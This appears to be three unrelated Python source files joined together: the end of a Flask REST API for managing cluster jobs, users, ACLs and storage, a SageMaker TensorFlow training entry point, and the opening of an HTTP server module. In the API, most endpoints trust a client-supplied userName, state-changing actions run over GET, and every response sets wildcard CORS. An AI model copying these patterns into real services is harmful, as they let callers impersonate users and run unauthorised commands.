result = JobRestAPIUtils.PauseJob(userName, jobId)
ret = {}
if result:
ret["result"] = "Success, the job is scheduled to be paused."
else:
ret["result"] = "Cannot pause the job. Job ID:" + jobId
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(PauseJob, '/PauseJob')
class ResumeJob(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('jobId')
parser.add_argument('userName')
args = parser.parse_args()
jobId = args["jobId"]
userName = args["userName"]
result = JobRestAPIUtils.ResumeJob(userName, jobId)
ret = {}
if result:
ret["result"] = "Success, the job is scheduled to be resumed."
else:
ret["result"] = "Cannot resume the job. Job ID:" + jobId
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(ResumeJob, '/ResumeJob')
class CloneJob(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('jobId')
parser.add_argument('userName')
args = parser.parse_args()
jobId = args["jobId"]
userName = args["userName"]
result = JobRestAPIUtils.CloneJob(userName, jobId)
ret = {}
if result:
ret["result"] = "Success, the job is scheduled to be cloned."
else:
ret["result"] = "Cannot clone the job. Job ID:" + jobId
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(CloneJob, '/CloneJob')
class ApproveJob(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('jobId')
parser.add_argument('userName')
args = parser.parse_args()
jobId = args["jobId"]
userName = args["userName"]
result = JobRestAPIUtils.ApproveJob(userName, jobId)
ret = {}
if result:
ret["result"] = "Success, the job has been approved."
else:
ret["result"] = "Cannot approve the job. Job ID:" + jobId
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(ApproveJob, '/ApproveJob')
class GetCommands(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('jobId')
parser.add_argument('userName')
args = parser.parse_args()
jobId = args["jobId"]
userName = args["userName"]
commands = JobRestAPIUtils.GetCommands(userName, jobId)
resp = jsonify(commands)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(GetCommands, '/GetCommands')
class GetJobDetail(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('jobId')
parser.add_argument('userName')
args = parser.parse_args()
jobId = args["jobId"]
userName = args["userName"]
job = JobRestAPIUtils.GetJobDetail(userName, jobId)
job["jobParams"] = json.loads(base64decode(job["jobParams"]))
if "endpoints" in job and job["endpoints"] is not None and len(job["endpoints"].strip()) > 0:
job["endpoints"] = json.loads(job["endpoints"])
if "jobStatusDetail" in job and job["jobStatusDetail"] is not None and len(job["jobStatusDetail"].strip()) > 0:
try:
job["jobStatusDetail"] = json.loads(base64decode(job["jobStatusDetail"]))
except Exception as e:
pass
if "jobMeta" in job:
job.pop("jobMeta",None)
# Remove credentials
remove_creds(job)
resp = jsonify(job)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(GetJobDetail, '/GetJobDetail')
class GetJobDetailV2(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('jobId')
parser.add_argument('userName')
args = parser.parse_args()
jobId = args["jobId"]
userName = args["userName"]
job = JobRestAPIUtils.GetJobDetailV2(userName, jobId)
remove_creds(job)
resp = generate_response(job)
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(GetJobDetailV2, '/GetJobDetailV2')
class GetJobLog(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('jobId', required=True)
parser.add_argument('userName', required=True)
args = parser.parse_args()
jobId = args["jobId"]
userName = args["userName"]
return JobRestAPIUtils.GetJobLog(userName, jobId)
##
## Actually setup the Api resource routing here
##
api.add_resource(GetJobLog, '/GetJobLog')
class GetJobStatus(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('jobId')
args = parser.parse_args()
jobId = args["jobId"]
job = JobRestAPIUtils.GetJobStatus(jobId)
resp = jsonify(job)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(GetJobStatus, '/GetJobStatus')
class GetClusterStatus(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('userName')
args = parser.parse_args()
userName = args["userName"]
cluster_status, last_updated_time = JobRestAPIUtils.GetClusterStatus()
cluster_status["last_updated_time"] = last_updated_time
resp = jsonify(cluster_status)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(GetClusterStatus, '/GetClusterStatus')
class AddCommand(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('jobId')
parser.add_argument('command')
parser.add_argument('userName')
args = parser.parse_args()
userName = args["userName"]
jobId = args["jobId"]
command = args["command"]
ret = {}
if command is None or len(command) == 0:
ret["result"] = "Cannot Run empty Command. Job ID:" + jobId
else:
result = JobRestAPIUtils.AddCommand(userName, jobId, command)
if result:
ret["result"] = "Success, the command is scheduled to be run."
else:
ret["result"] = "Cannot Run the Command. Job ID:" + jobId
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(AddCommand, '/AddCommand')
class AddUser(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('userName')
parser.add_argument('uid')
parser.add_argument('gid')
parser.add_argument('groups')
args = parser.parse_args()
ret = {}
userName = args["userName"]
if args["uid"] is None or len(args["uid"].strip()) == 0:
uid = authorization.INVALID_ID
else:
uid = args["uid"]
if args["gid"] is None or len(args["gid"].strip()) == 0:
gid = authorization.INVALID_ID
else:
gid = args["gid"]
if args["groups"] is None or len(args["groups"].strip()) == 0:
groups = []
else:
groups = args["groups"]
ret["status"] = JobRestAPIUtils.AddUser(userName, uid, gid, groups)
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(AddUser, '/AddUser')
class GetAllUsers(Resource):
def get(self):
data_handler = None
try:
data_handler = DataHandler()
ret = data_handler.GetUsers()
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
except Exception as e:
return "Internal Server Error. " + str(e), 400
finally:
if data_handler is not None:
data_handler.Close()
##
## Actually setup the Api resource routing here
##
api.add_resource(GetAllUsers, '/GetAllUsers')
class UpdateAce(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('userName')
parser.add_argument('identityName')
parser.add_argument('resourceType')
parser.add_argument('resourceName')
parser.add_argument('permissions')
args = parser.parse_args()
username = args["userName"]
identityName = str(args["identityName"])
resourceType = int(args["resourceType"])
resourceName = str(args["resourceName"])
permissions = int(args["permissions"])
ret = {}
ret["result"] = JobRestAPIUtils.UpdateAce(username, identityName, resourceType, resourceName, permissions)
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(UpdateAce, '/UpdateAce')
class DeleteAce(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('userName')
parser.add_argument('identityName')
parser.add_argument('resourceType')
parser.add_argument('resourceName')
args = parser.parse_args()
username = args["userName"]
identityName = str(args["identityName"])
resourceType = int(args["resourceType"])
resourceName = str(args["resourceName"])
ret = {}
ret["result"] = JobRestAPIUtils.DeleteAce(username, identityName, resourceType, resourceName)
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(DeleteAce, '/DeleteAce')
class IsClusterAdmin(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('userName')
args = parser.parse_args()
username = args["userName"]
ret = {}
ret["result"] = AuthorizationManager.IsClusterAdmin(username)
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(IsClusterAdmin, '/IsClusterAdmin')
class GetACL(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('userName')
args = parser.parse_args()
username = args["userName"]
ret = {}
ret["result"] = AuthorizationManager.GetAcl(username)
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(GetACL, '/GetACL')
class GetAllACL(Resource):
def get(self):
ret = {}
ret["result"] = ACLManager.GetAllAcl()
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(GetAllACL, '/GetAllACL')
class ListVCs(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('userName')
args = parser.parse_args()
userName = args["userName"]
ret = {}
ret["result"] = JobRestAPIUtils.ListVCs(userName)
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(ListVCs, '/ListVCs')
class GetVC(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('userName')
parser.add_argument('vcName')
args = parser.parse_args()
userName = args["userName"]
vcName = args["vcName"]
ret = JobRestAPIUtils.GetVC(userName, vcName)
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(GetVC, '/GetVC')
class AddVC(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('vcName')
parser.add_argument('quota')
parser.add_argument('metadata')
parser.add_argument('userName')
args = parser.parse_args()
vcName = args["vcName"]
quota = args["quota"]
metadata = args["metadata"]
userName = args["userName"]
ret = {}
ret["result"] = JobRestAPIUtils.AddVC(userName, vcName, quota, metadata)
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(AddVC, '/AddVC')
class DeleteVC(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('vcName')
parser.add_argument('userName')
args = parser.parse_args()
vcName = args["vcName"]
userName = args["userName"]
ret = {}
ret["result"] = JobRestAPIUtils.DeleteVC(userName, vcName)
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(DeleteVC, '/DeleteVC')
class UpdateVC(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('vcName')
parser.add_argument('quota')
parser.add_argument('metadata')
parser.add_argument('userName')
args = parser.parse_args()
vcName = args["vcName"]
quota = args["quota"]
metadata = args["metadata"]
userName = args["userName"]
ret = {}
ret["result"] = JobRestAPIUtils.UpdateVC(userName, vcName, quota, metadata)
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(UpdateVC, '/UpdateVC')
class ListStorages(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('vcName')
parser.add_argument('userName')
args = parser.parse_args()
vcName = args["vcName"]
userName = args["userName"]
ret = {}
ret["result"] = JobRestAPIUtils.ListStorages(userName, vcName)
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(ListStorages, '/ListStorages')
class AddStorage(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('vcName')
parser.add_argument('storageType')
parser.add_argument('url')
parser.add_argument('metadata')
parser.add_argument('defaultMountPath')
parser.add_argument('userName')
args = parser.parse_args()
vcName = args["vcName"]
storageType = args["storageType"]
url = args["url"]
metadata = args["metadata"]
defaultMountPath = args["defaultMountPath"]
userName = args["userName"]
ret = {}
ret["result"] = JobRestAPIUtils.AddStorage(userName, vcName, url, storageType, metadata, defaultMountPath)
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(AddStorage, '/AddStorage')
class DeleteStorage(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('vcName')
parser.add_argument('userName')
parser.add_argument('url')
args = parser.parse_args()
vcName = args["vcName"]
userName = args["userName"]
url = args["url"]
ret = {}
ret["result"] = JobRestAPIUtils.DeleteStorage(userName, vcName, url)
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(DeleteStorage, '/DeleteStorage')
class UpdateStorage(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('vcName')
parser.add_argument('storageType')
parser.add_argument('url')
parser.add_argument('metadata')
parser.add_argument('defaultMountPath')
parser.add_argument('userName')
args = parser.parse_args()
vcName = args["vcName"]
storageType = args["storageType"]
url = args["url"]
metadata = args["metadata"]
defaultMountPath = args["defaultMountPath"]
userName = args["userName"]
ret = {}
ret["result"] = JobRestAPIUtils.UpdateStorage(userName, vcName, url, storageType, metadata, defaultMountPath)
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(UpdateStorage, '/UpdateStorage')
class Endpoint(Resource):
def get(self):
'''return job["endpoints"]: curl -X GET /endpoints?jobId=...&userName=...'''
parser = reqparse.RequestParser()
parser.add_argument('jobId')
parser.add_argument('userName')
args = parser.parse_args()
jobId = args["jobId"]
username = args["userName"]
ret = JobRestAPIUtils.GetEndpoints(username, jobId)
# TODO: return 403 error code
# Return empty list for now to keep backward compatibility with old portal.
resp = generate_response(ret)
return resp
def post(self):
'''set job["endpoints"]: curl -X POST -H "Content-Type: application/json" /endpoints --data "{'jobId': ..., 'endpoints': ['ssh', 'ipython'] }"'''
parser = reqparse.RequestParser()
parser.add_argument('userName')
args = parser.parse_args()
username = args["userName"]
params = request.get_json(silent=True)
job_id = params["jobId"]
requested_endpoints = params["endpoints"]
interactive_ports = []
# endpoints should be ["ssh", "ipython", "tensorboard", {"name": "port name", "podPort": "port on pod in 40000-49999"}]
for interactive_port in [ elem for elem in requested_endpoints if elem not in ["ssh", "ipython", "tensorboard"] ]:
if any(required_field not in interactive_port for required_field in ["name", "podPort"]):
# if ["name", "port"] not in interactive_port:
return ("Bad request, interactive port should have \"name\" and \"podPort\"]: %s" % requested_endpoints), 400
if int(interactive_port["podPort"]) < 40000 or int(interactive_port["podPort"]) > 49999:
return ("Bad request, interactive podPort should in range 40000-49999: %s" % requested_endpoints), 400
if len(interactive_port["name"]) > 16:
return ("Bad request, interactive port name length shoule be less than 16: %s" % requested_endpoints), 400
interactive_ports.append(interactive_port)
msg, statusCode = JobRestAPIUtils.UpdateEndpoints(username, job_id, requested_endpoints, interactive_ports)
if statusCode != 200:
return msg, statusCode
resp = generate_response(msg)
return resp
##
## Actually setup the Endpoint resource routing here
##
api.add_resource(Endpoint, '/endpoints')
class Templates(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('vcName', location="args")
parser.add_argument('userName', location="args")
args = parser.parse_args()
vcName = args["vcName"]
userName = args["userName"]
dataHandler = DataHandler()
ret = dataHandler.GetTemplates("master") or []
ret += dataHandler.GetTemplates("vc:" + vcName) or []
ret += dataHandler.GetTemplates("user:" + userName) or []
dataHandler.Close()
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
def post(self):
parser = reqparse.RequestParser()
parser.add_argument('vcName', location="args")
parser.add_argument('userName', location="args")
parser.add_argument('database', location="args")
parser.add_argument('templateName', location="args")
args = parser.parse_args()
vcName = args["vcName"]
userName = args["userName"]
database = args["database"]
templateName = args["templateName"]
if database == 'master':
if AuthorizationManager.HasAccess(userName, ResourceType.Cluster, "", Permission.Admin):
scope = 'master'
else:
return 'access denied', 403;
elif database == 'vc':
if AuthorizationManager.HasAccess(userName, ResourceType.VC, vcName, Permission.Admin):
scope = 'vc:' + vcName
else:
return 'access denied', 403;
else:
scope = 'user:' + userName
template_json = request.json
if template_json is None:
return jsonify(result=False, message="Invalid JSON")
dataHandler = DataHandler()
ret = {}
ret["result"] = dataHandler.UpdateTemplate(templateName, scope, json.dumps(template_json))
dataHandler.Close()
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
def delete(self):
parser = reqparse.RequestParser()
parser.add_argument('vcName', location="args")
parser.add_argument('userName', location="args")
parser.add_argument('database', location="args")
parser.add_argument('templateName', location="args")
args = parser.parse_args()
vcName = args["vcName"]
userName = args["userName"]
database = args["database"]
templateName = args["templateName"]
if database == 'master':
if AuthorizationManager.HasAccess(userName, ResourceType.Cluster, "", Permission.Admin):
scope = 'master'
else:
return 'access denied', 403;
elif database == 'vc':
if AuthorizationManager.HasAccess(userName, ResourceType.VC, vcName, Permission.Admin):
scope = 'vc:' + vcName
else:
return 'access denied', 403;
else:
scope = 'user:' + userName
dataHandler = DataHandler()
ret = {}
ret["result"] = dataHandler.DeleteTemplate(templateName, scope)
dataHandler.Close()
resp = jsonify(ret)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
api.add_resource(Templates, '/templates')
class JobPriority(Resource):
def get(self):
job_priorites = JobRestAPIUtils.get_job_priorities()
resp = jsonify(job_priorites)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
return resp
def post(self):
parser = reqparse.RequestParser()
parser.add_argument('userName', location="args")
args = parser.parse_args()
username = args["userName"]
payload = request.get_json(silent=True)
success, all_job_priorities = JobRestAPIUtils.update_job_priorites(username, payload)
http_status = 200 if success else 400
# Only return job_priorities affected in the POST request
job_priorities = {}
for job_id, _ in list(payload.items()):
if job_id in all_job_priorities:
job_priorities[job_id] = all_job_priorities[job_id]
else:
job_priorities[job_id] = JobRestAPIUtils.DEFAULT_JOB_PRIORITY
resp = jsonify(job_priorities)
resp.headers["Access-Control-Allow-Origin"] = "*"
resp.headers["dataType"] = "json"
resp.status_code = http_status
return resp
##
## Actually setup the Api resource routing here
##
api.add_resource(JobPriority, '/jobs/priorities')
@app.route("/metrics")
def metrics():
return Response(prometheus_client.generate_latest(), mimetype=CONTENT_TYPE_LATEST)
if __name__ == '__main__':
app.run(debug=False,host="0.0.0.0",threaded=True)
|
training.py
|
# Copyright 2018-2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License'). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the 'license' file accompanying this file. This file is
# distributed on an 'AS IS' BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from __future__ import absolute_import
import json
import logging
import multiprocessing
import os
import subprocess
import time
import sagemaker_containers.beta.framework as framework
import tensorflow as tf
from sagemaker_tensorflow_container import s3_utils
logger = logging.getLogger(__name__)
SAGEMAKER_PARAMETER_SERVER_ENABLED = 'sagemaker_parameter_server_enabled'
MODEL_DIR = '/opt/ml/model'
def _is_host_master(hosts, current_host):
return current_host == hosts[0]
def _build_tf_config(hosts, current_host, ps_task=False):
"""Builds a dictionary containing cluster information based on number of hosts and number of
parameter servers.
Args:
hosts (list[str]): List of host names in the cluster
current_host (str): Current host name
ps_task (bool): Set to True if this config is built for a parameter server process
(default: False)
Returns:
dict[str: dict]: A dictionary describing the cluster setup for distributed training.
For more information regarding TF_CONFIG:
https://cloud.google.com/ml-engine/docs/tensorflow/distributed-training-details
"""
# Assign the first host as the master. Rest of the hosts if any will be worker hosts.
# The first ps_num hosts will also have a parameter task assign to them.
masters = hosts[:1]
workers = hosts[1:]
ps = hosts if len(hosts) > 1 else None
def host_addresses(hosts, port=2222):
return ['{}:{}'.format(host, port) for host in hosts]
tf_config = {
'cluster': {
'master': host_addresses(masters)
},
'environment': 'cloud'
}
if ps:
tf_config['cluster']['ps'] = host_addresses(ps, port='2223')
if workers:
tf_config['cluster']['worker'] = host_addresses(workers)
if ps_task:
if ps is None:
raise ValueError(
'Cannot have a ps task if there are no parameter servers in the cluster')
task_type = 'ps'
task_index = ps.index(current_host)
elif _is_host_master(hosts, current_host):
task_type = 'master'
task_index = 0
else:
task_type = 'worker'
task_index = workers.index(current_host)
tf_config['task'] = {'index': task_index, 'type': task_type}
return tf_config
def _run_ps(env, cluster):
logger.info('Running distributed training job with parameter servers')
cluster_spec = tf.train.ClusterSpec(cluster)
task_index = env.hosts.index(env.current_host)
# Force parameter server to run on cpu. Running multiple TensorFlow processes on the same
# GPU is not safe:
# https://stackoverflow.com/questions/46145100/is-it-unsafe-to-run-multiple-tensorflow-processes-on-the-same-gpu
no_gpu_config = tf.ConfigProto(device_count={'GPU': 0})
server = tf.train.Server(
cluster_spec, job_name='ps', task_index=task_index, config=no_gpu_config
)
multiprocessing.Process(target=lambda: server.join()).start()
def _run_worker(env, cmd_args, tf_config):
env_vars = env.to_env_vars()
env_vars['TF_CONFIG'] = json.dumps(tf_config)
framework.entry_point.run(env.module_dir, env.user_entry_point, cmd_args, env_vars)
def _wait_until_master_is_down(master):
while True:
try:
subprocess.check_call(
['curl', '{}:2222'.format(master)], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
logger.info('master {} is still up, waiting for it to exit'.format(master))
time.sleep(10)
except subprocess.CalledProcessError:
logger.info('master {} is down, stopping parameter server'.format(master))
return
def train(env, cmd_args):
"""Get training job environment from env and run the training job.
Args:
env (sagemaker_containers.beta.framework.env.TrainingEnv): Instance of TrainingEnv class
"""
parameter_server_enabled = env.additional_framework_parameters.get(
SAGEMAKER_PARAMETER_SERVER_ENABLED, False)
if len(env.hosts) > 1 and parameter_server_enabled:
tf_config = _build_tf_config(hosts=env.hosts, current_host=env.current_host)
logger.info('Running distributed training job with parameter servers')
logger.info('Launching parameter server process')
_run_ps(env, tf_config['cluster'])
logger.info('Launching worker process')
_run_worker(env, cmd_args, tf_config)
if not _is_host_master(env.hosts, env.current_host):
_wait_until_master_is_down(env.hosts[0])
else:
mpi_enabled = env.additional_framework_parameters.get('sagemaker_mpi_enabled')
if mpi_enabled:
runner_type = framework.runner.MPIRunnerType
else:
runner_type = framework.runner.ProcessRunnerType
framework.entry_point.run(env.module_dir, env.user_entry_point, cmd_args, env.to_env_vars(),
runner=runner_type)
def _log_model_missing_warning(model_dir):
pb_file_exists = False
file_exists = False
for dirpath, dirnames, filenames in os.walk(model_dir):
if filenames:
file_exists = True
for f in filenames:
if 'saved_model.pb' in f or 'saved_model.pbtxt' in f:
pb_file_exists = True
path, direct_parent_dir = os.path.split(dirpath)
if not str.isdigit(direct_parent_dir):
logger.warn('Your model will NOT be servable with SageMaker TensorFlow Serving containers. '
'The SavedModel bundle is under directory \"{}\", not a numeric name.'
.format(direct_parent_dir))
if not file_exists:
logger.warn('No model artifact is saved under path {}.'
' Your training job will not save any model files to S3.\n'
'For details of how to construct your training script see:\n'
'https://sagemaker.readthedocs.io/en/stable/using_tf.html#adapting-your-local-tensorflow-script'
.format(model_dir))
elif not pb_file_exists:
logger.warn('Your model will NOT be servable with SageMaker TensorFlow Serving container. '
'The model artifact was not saved in the TensorFlow SavedModel directory structure:\n'
'https://www.tensorflow.org/guide/saved_model#structure_of_a_savedmodel_directory')
def _model_dir_with_training_job(model_dir, job_name):
if model_dir.startswith('/opt/ml'):
return model_dir
else:
return '{}/{}/model'.format(model_dir, job_name)
def main():
"""Training entry point
"""
hyperparameters = framework.env.read_hyperparameters()
env = framework.training_env(hyperparameters=hyperparameters)
user_hyperparameters = env.hyperparameters
# If the training job is part of the multiple training jobs for tuning, we need to append the training job name to
# model_dir in case they read from/write to the same object
if '_tuning_objective_metric' in hyperparameters:
model_dir = _model_dir_with_training_job(hyperparameters.get('model_dir'), env.job_name)
logger.info('Appending the training job name to model_dir: {}'.format(model_dir))
user_hyperparameters['model_dir'] = model_dir
s3_utils.configure(user_hyperparameters.get('model_dir'), os.environ.get('SAGEMAKER_REGION'))
train(env, framework.mapping.to_cmd_args(user_hyperparameters))
_log_model_missing_warning(MODEL_DIR)
|
server.py
|
"""
A high-speed, production ready, thread pooled, generic HTTP server.
For those of you wanting to understand internals of this module, here's the
basic call flow. The server's listening thread runs a very tight loop,
sticking incoming connections onto a Queue::
server = HTTPServer(...)
server.start()
-> while True:
tick()
# This blocks until a request comes in:
child = socket.accept()
conn = HTTPConnection(child, ...)
server.requests.put(conn)
Worker threads are kept in a pool and poll the Queue, popping off and then
handling each connection in turn. Each connection can consist of an arbitrary
number of requests and their responses, so we run a nested loop::
while True:
conn = server.requests.get()
conn.communicate()
-> while True:
req = HTTPRequest(...)
req.parse_request()
-> # Read the Request-Line, e.g. "GET /page HTTP/1.1"
req.rfile.readline()
read_headers(req.rfile, req.inheaders)
req.respond()
-> response = app(...)
try:
for chunk in response:
if chunk:
req.write(chunk)
finally:
if hasattr(response, "close"):
response.close()
if req.close_connection:
return
For running a server you can invoke :func:`start() <HTTPServer.start()>` (it
will run the server forever) or use invoking :func:`prepare()
<HTTPServer.prepare()>` and :func:`serve() <HTTPServer.serve()>` like this::
server = HTTPServer(...)
server.prepare()
try:
threading.Thread(target=server.serve).start()
# waiting/detecting some appropriate stop condition here
...
finally:
server.stop()
And now for a trivial doctest to exercise the test suite
>>> 'HTTPServer' in globals()
True
"""
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import os
import io
import re
import email.utils
import socket
import sys
import time
import traceback as traceback_
import logging
import platform
import contextlib
import threading
try:
from functools import lru_cache
except ImportError:
from backports.functools_lru_cache import lru_cache
import six
from six.moves import queue
from six.moves import urllib
from . import connections, errors, __version__
from ._compat import bton, ntou
from ._compat import IS_PPC
from .workers import threadpool
from .makefile import MakeFile, StreamWriter
__all__ = (
'HTTPRequest', 'HTTPConnection', 'HTTPServer',
'HeaderReader', 'DropUnderscoreHeaderReader',
'SizeCheckWrapper', 'KnownLengthRFile', 'ChunkedRFile',
'Gateway', 'get_ssl_adapter_class',
)
IS_WINDOWS = platform.system() == 'Windows'
"""Flag indicating whether the app is running under Windows."""
IS_GAE = os.getenv('SERVER_SOFTWARE', '').startswith('Google App Engine/')
"""Flag indicating whether the app is running in GAE env.
Ref:
https://cloud.google.com/appengine/docs/standard/python/tools
/using-local-server#detecting_application_runtime_environment
"""
IS_UID_GID_RESOLVABLE = not IS_WINDOWS and not IS_GAE
"""Indicates whether UID/GID resolution's available under current platform."""
if IS_UID_GID_RESOLVABLE:
try:
import grp
import pwd
except ImportError:
"""Unavailable in the current env.
This shouldn't be happening normally.
All of the known cases are excluded via the if clause.
"""
IS_UID_GID_RESOLVABLE = False
grp, pwd = None, None
import struct
if IS_WINDOWS and hasattr(socket, 'AF_INET6'):
if not hasattr(socket, 'IPPROTO_IPV6'):
socket.IPPROTO_IPV6 = 41
if not hasattr(socket, 'IPV6_V6ONLY'):
socket.IPV6_V6ONLY = 27
if not hasattr(socket, 'SO_PEERCRED'):
"""
NOTE: the value for SO_PEERCRED can be architecture specific, in
which case the getsockopt() will hopefully fail. The arch
specific value could be derived from platform.processor()
"""
socket.SO_PEERCRED = 21 if IS_PPC else 17
LF = b'\n'
CRLF = b'\r\n'
TAB = b'\t'
SPACE = b' '
COLON = b':'
SEMICOLON = b';'
EMPTY = b''
ASTERISK = b'*'
FORWARD_SLASH = b'/'
QUOTED_SLASH = b'%2F'
QUOTED_SLASH_REGEX = re.compile(b''.join((b'(?i)', QUOTED_SLASH)))
comma_separated_headers = [
b'Accept', b'Accept-Charset', b'Accept-Encoding',
b'Accept-Language', b'Accept-Ranges', b'Allow', b'Cache-Control',
b'Connection', b'Content-Encoding', b'Content-Language', b'Expect',
b'If-Match', b'If-None-Match', b'Pragma', b'Proxy-Authenticate', b'TE',
b'Trailer', b'Transfer-Encoding', b'Upgrade', b'Vary', b'Via', b'Warning',
b'WWW-Authenticate',
]
if not hasattr(logging, 'statistics'):
logging.statistics = {}
class HeaderReader:
"""Object for reading headers from an HTTP request.
Interface and default implementation.
"""
def __call__(self, rfile, hdict=None): # noqa: C901 # FIXME
"""
Read headers from the given stream into the given header dict.
If hdict is None, a new header dict is created. Returns the populated
header dict.
Headers which are repeated are folded together using a comma if their
specification so dictates.
This function raises ValueError when the read bytes violate the HTTP
spec.
You should probably return "400 Bad Request" if this happens.
"""
if hdict is None:
hdict = {}
while True:
line = rfile.readline()
if not line:
# No more data--illegal end of headers
raise ValueError('Illegal end of headers.')
if line == CRLF:
# Normal end of headers
break
if not line.endswith(CRLF):
raise ValueError('HTTP requires CRLF terminators')
if line[0] in (SPACE, TAB):
# It's a continuation line.
v = line.strip()
else:
try:
k, v = line.split(COLON, 1)
except ValueError:
raise ValueError('Illegal header line.')
v = v.strip()
k = self._transform_key(k)
hname = k
if not self._allow_header(k):
continue
if k in comma_separated_headers:
existing = hdict.get(hname)
if existing:
